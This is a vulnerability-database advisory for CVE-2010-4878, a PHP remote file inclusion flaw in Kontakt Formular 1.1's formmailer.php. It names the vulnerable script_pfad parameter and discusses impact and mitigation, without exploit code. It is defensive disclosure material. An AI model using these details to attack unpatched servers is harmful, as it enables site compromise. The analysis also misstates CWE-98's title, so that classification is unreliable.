CVE-2010-4878 in Kontakt Formular
Summary
by MITRE
PHP remote file inclusion vulnerability in formmailer.php in Kontakt Formular 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the script_pfad parameter.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 09/16/2025
The vulnerability described in CVE-2010-4878 represents a critical remote file inclusion flaw affecting the Kontakt Formular 1.1 plugin for PHP-based web applications. This issue manifests in the formmailer.php script where improper input validation allows malicious actors to inject arbitrary URLs into the script_pfad parameter, thereby enabling remote code execution. The vulnerability stems from the plugin's failure to properly sanitize user-supplied input before incorporating it into file system operations, creating an avenue for attackers to load and execute malicious code from remote servers.
From a technical perspective, this vulnerability operates under CWE-98, which specifically addresses "Improper Control of Generation of Code ('Code Injection')" and aligns with the broader category of CWE-20, "Improper Input Validation." The flaw occurs when the application accepts user input through the script_pfad parameter without adequate sanitization or validation, allowing attackers to manipulate the execution flow of the application. The vulnerability is classified as a remote code execution vector because it enables attackers to execute arbitrary PHP code on the target server, potentially leading to complete system compromise.
The operational impact of this vulnerability extends beyond simple code injection, as it provides attackers with the capability to establish persistent access to affected systems. Attackers can leverage this flaw to upload backdoor scripts, steal sensitive data, modify website content, or use the compromised server as a launchpad for further attacks within the network. The remote nature of the vulnerability means that attackers do not require physical access or local network privileges to exploit the flaw, making it particularly dangerous for web applications that are publicly accessible. According to ATT&CK framework, this vulnerability maps to T1190 "Exploit Public-Facing Application" and T1059.007 "Command and Scripting Interpreter: PHP," highlighting the attack vectors and techniques that adversaries can employ.
Mitigation strategies for CVE-2010-4878 must address both immediate remediation and long-term security hardening measures. The primary recommendation involves updating to the latest version of the Kontakt Formular plugin where the vulnerability has been patched. Administrators should also implement input validation measures that reject any non-numeric or non-alphanumeric characters in the script_pfad parameter, as well as disable the ability to include remote files through configuration settings. Network-level protections such as web application firewalls and intrusion detection systems can provide additional defense-in-depth layers. The vulnerability also underscores the importance of following secure coding practices including input sanitization, output encoding, and least privilege principles as outlined in industry standards such as OWASP Top Ten and NIST Cybersecurity Framework, which emphasize the need for robust input validation to prevent such injection-based attacks.